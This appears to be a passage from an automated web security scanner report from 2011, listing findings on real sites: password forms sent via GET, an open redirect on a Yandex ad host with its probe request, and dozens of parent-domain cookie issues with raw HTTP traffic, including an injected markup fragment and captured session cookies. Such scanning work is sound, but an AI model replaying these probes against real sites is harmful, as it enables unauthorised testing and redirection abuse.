Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?'"--></style>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

13.4. http://my.webalta.ru/public/engine/templates.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://my.webalta.ru/public/engine/templates.js

The form contains the following password field:

pass

Request

Response

13.5. http://my.webalta.ru/public/engine/templates.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://my.webalta.ru/public/engine/templates.js

The form contains the following password fields:

pass
pass2

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td style=\'width:50%;\'><form onsubmit="f_reg(this); return false;" >';
       str+='...................... ................... ...... ......................, ...... ........ ................ .......... .................. .. ................ .......................';
       s
...[SNIP]...
<br><input size=20 name="pass" type="password" value="" onClick=\'this.focus();\'>';
       str+='<br>
...[SNIP]...
<br><input size=20 name="pass2" type="password" value="" onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

14. Open redirection previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://an.yandex.ru
Path:	/count/Ijtkb0MgGE440000ZhGnMDi4XP4H3fK2cm5kGoi1CuYjHd42YQMmoXgO1vsOQXQSkwfZHm6MfVcfmfgb3ijKagP3JWEAexCl0QMTAIkHj6-WPWoFiJVw7GAViYYJd0QJL9bNYw9wcWH2Z90r3A2GQXYdZoEZ0QG2V0q0

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a7d7bab4fd77ae98a/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://www.iveco-ptc.spb.ru?.a7d7bab4fd77ae98a/=1&_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /count/Ijtkb0MgGE440000ZhGnMDi4XP4H3fK2cm5kGoi1CuYjHd42YQMmoXgO1vsOQXQSkwfZHm6MfVcfmfgb3ijKagP3JWEAexCl0QMTAIkHj6-WPWoFiJVw7GAViYYJd0QJL9bNYw9wcWH2Z90r3A2GQXYdZoEZ0QG2V0q0?test-tag=17073164&.a7d7bab4fd77ae98a/=1 HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:35:17 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:35:17 GMT
Expires: Mon, 25 Apr 2011 14:35:17 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://www.iveco-ptc.spb.ru?.a7d7bab4fd77ae98a/=1&_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU
Content-Length: 0

15. Cookie scoped to parent domain previous next
There are 97 instances of this issue:

http://www.gartner.com/technology/contact/contact_gartner.jsp
http://www.trucklist.ru/cars/trucks
http://ad.afy11.net/ad
http://ad.amgdgt.com/ads/
http://ad.trafficmp.com/a/bpix
http://ad.trafficmp.com/a/bpix
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.voicefive.com/b
http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204
http://core1.node15.top.mail.ru/counter
http://core2.node12.top.mail.ru/counter
http://d7.zedo.com/img/bh.gif
http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter
http://goods.adnectar.com/analytics/get_avia_js
http://ib.adnxs.com/ab
http://ib.adnxs.com/pxj
http://idcs.interclick.com/Segment.aspx
http://m.adnxs.com/msftcookiehandler
http://map.media6degrees.com/orbserv/aopix
http://mc.yandex.ru/watch/57617
http://pixel.fetchback.com/serve/fb/pdc
http://pixel.quantserve.com/pixel
http://pixel.rubiconproject.com/tap.php
http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil
http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif
http://pogoda.webalta.ru/
http://r2.mail.ru/b12179277.gif
http://r2.mail.ru/b12179279.gif
http://r2.mail.ru/b12179280.gif
http://r2.mail.ru/b12201458.png
http://r2.mail.ru/b12526055.gif
http://r2.mail.ru/b12526056.jpg
http://r2.mail.ru/b12526057.jpg
http://r2.mail.ru/b12526058.jpg
http://r2.mail.ru/b12526059.jpg
http://r2.mail.ru/b12526060.jpg
http://r2.mail.ru/b12526061.jpg
http://r2.mail.ru/b12526062.jpg
http://r2.mail.ru/b12526063.jpg
http://r2.mail.ru/b12526064.jpg
http://r2.mail.ru/b12526065.gif
http://r2.mail.ru/b12526191.gif
http://r2.mail.ru/b12526192.gif
http://r2.mail.ru/b12526193.gif
http://r2.mail.ru/b12526194.gif
http://r2.mail.ru/b12526208.gif
http://r2.mail.ru/b12526210.gif
http://r2.mail.ru/b12527647.gif
http://r2.mail.ru/b12529050.jpg
http://r2.mail.ru/b12530142.jpg
http://r2.mail.ru/b12530159.jpg
http://r2.mail.ru/b12531249.jpg
http://r2.mail.ru/b12531545.jpg
http://r2.mail.ru/b12531624.jpg
http://r2.mail.ru/b12532203.jpg
http://r2.mail.ru/b12752186.jpg
http://r2.mail.ru/b12752583.jpg
http://r2.mail.ru/b12752584.jpg
http://r2.mail.ru/b12752585.jpg
http://r2.mail.ru/b12752586.jpg
http://r2.mail.ru/b12855502.png
http://r2.mail.ru/b12887675.jpg
http://r2.mail.ru/b12887676.jpg
http://r2.mail.ru/b12887677.jpg
http://r2.mail.ru/b12961140.jpg
http://r2.mail.ru/b12961154.jpg
http://r2.mail.ru/b12961373.jpg
http://r2.mail.ru/b12962356.jpg
http://r2.mail.ru/b12963308.jpg
http://r2.mail.ru/b12965362.jpg
http://r2.mail.ru/b12968616.jpg
http://r2.mail.ru/b12979027.jpg
http://r2.mail.ru/b13039712.jpg
http://r2.mail.ru/b13044176.jpg
http://r2.mail.ru/b13049054.jpg
http://r2.mail.ru/b13050852.jpg
http://r2.mail.ru/b13057590.swf
http://r2.mail.ru/b13058787.jpg
http://r2.mail.ru/b13058840.jpg
http://r2.mail.ru/b13058851.jpg
http://r2.mail.ru/b13058852.jpg
http://r2.mail.ru/b13058968.jpg
http://r2.mail.ru/b13059223.jpg
http://r2.mail.ru/b13059860.jpg
http://r2.mail.ru/b13060405.jpg
http://r2.mail.ru/b13060487.jpg
http://r2.mail.ru/b13061099.jpg
http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif
http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif
http://segment-pixel.invitemedia.com/pixel
http://storage.trafic.ro/js/trafic.js
http://top5.mail.ru/counter
http://www.livejournal.com/tools/endpoints/journalspotlight.bml
http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388

15.1. http://www.gartner.com/technology/contact/contact_gartner.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.gartner.com
Path:	/technology/contact/contact_gartner.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MKTSESSIONID=nMx8N1kBgpd2v7XKWLb9qTL1ySyvfknTRk77TT2XbtpNyfyvrwqk!-1168810344; domain=.gartner.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /technology/contact/contact_gartner.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510

Response

15.2. http://www.trucklist.ru/cars/trucks previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/cars/trucks

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=1b167314767bdffd9a5c5c390d79c0cc; path=/; domain=trucklist.ru

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

15.3. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*,5*4db58744*bwSz6lRck8*TLWvV9Mp1Su71GX8*ACWaeyU=; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=5&external_user_id=xrd52zkwjuxh&custom_mon=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=dlTCn+fJdUa0LKLUTmKT9w; s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*; f=AgECAAAAAADQJJIL142rTdU9kgdm-bJN; c=AQEDAAAAAADd1IcE942rTQAAAAAAAAAAAAAAAAAAAADXjatNAQABAAVhFtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD-OLnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTSCgFcjqtNAAAAAAAAAAAAAAAAAAAAADuOq00BAAEABWEW1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP84udToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoOsmAWj9sk0AAAAAAAAAAAAAAAAAAAAAZv2yTQEAAQD5JiDV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyS71OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*,5*4db58744*bwSz6lRck8*TLWvV9Mp1Su71GX8*ACWaeyU=; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

15.4. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=97383008780889220&clkurl=http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAkxzWVwAAAAA./cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU./referrer=http%3A%2F%2Fwww.livejournal.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUDl0S8xnL7FEJVbNsodwmXFAeDNADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34vh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqFwb0J3fge50gbmzQ8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8geHOiFu.Wwgoz.C7ZWcDAwcwIe1kZGRkYAi8xcgMpBgMmBiEQXwFM7Dw0gKwMEsmIxtQkCWEiY2RHciQ38XEwA1SBk2DIAMZADWIkL4-

Response

15.5. http://ad.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

T_4uej=eo7%3A86y3%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
rth=2-ljzkpb-eo7~86y3~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_6sn9=dlx%3A6ot5%3A1; rth=2-ljzkpb-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:14:01 GMT
Connection: close
Set-Cookie: T_6sn9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4uej=eo7%3A86y3%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~86y3~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

15.6. http://ad.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

T_3evi=eo7%3A86yc%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
rth=2-ljzkpb-eo7~86yc~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_9xbg=eo7%3A85ej%3A1; rth=2-ljzkpb-eo7~85ej~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:14:11 GMT
Connection: close
Set-Cookie: T_9xbg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3evi=eo7%3A86yc%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~86yc~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

15.7. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303741228.986,wait-%3E10000,&1303741240885 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_G=method->-1,ts->1303741221; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:25 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

15.8. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:23 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:23 GMT; path=/; domain=.voicefive.com;
BMX_G=method->-1,ts->1303741403; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:23 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741403; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25091

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...

15.9. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:22:00 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?C1=8&C2=6035824&C3=1271511541440207100&C4=&C5=&C6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 14:22:00 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:22:00 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

15.10. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:20:21 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=88302011 HTTP/1.1
